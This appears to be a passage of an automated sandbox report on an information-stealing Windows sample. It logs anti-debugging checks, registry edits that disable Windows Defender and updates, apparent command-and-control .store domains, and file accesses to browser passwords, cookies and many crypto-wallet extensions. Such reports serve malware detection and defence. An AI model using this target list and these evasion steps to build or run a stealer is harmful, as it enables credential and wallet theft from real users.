          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: UK2346Q4E08RPNV0H.exe, 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmp, UK2346Q4E08RPNV0H.exe, 00000006.00000000.2577695862.0000000000E42000.00000080.00000001.01000000.00000006.sdmp, UK2346Q4E08RPNV0H.exe.0.drBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: file.exeBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile opened: NTICE
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile opened: SICE
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00E3C299 rdtsc 6_2_00E3C299
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00CBB7CA LdrInitializeThunk,6_2_00CBB7CA
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
          Source: file.exe, 00000000.00000003.2127133435.00000000050E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
          Source: UK2346Q4E08RPNV0H.exe, 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: .'Program Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRegistry value created: TamperProtection 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptionsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdatesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocationsJump to behavior
          Source: file.exe, 00000000.00000003.2221222976.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2136, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: file.exeString found in binary or memory: Wallets/Electrum-LTC
          Source: file.exeString found in binary or memory: Wallets/ElectronCash
          Source: file.exeString found in binary or memory: window-state.json
          Source: file.exe, 00000000.00000003.2201145754.0000000005BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx LibertyCbyvccar9N
          Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: file.exeString found in binary or memory: ExodusWeb3
          Source: file.exeString found in binary or memory: Wallets/Ethereum
          Source: file.exe, 00000000.00000003.2204911835.00000000014D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.2205278029.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
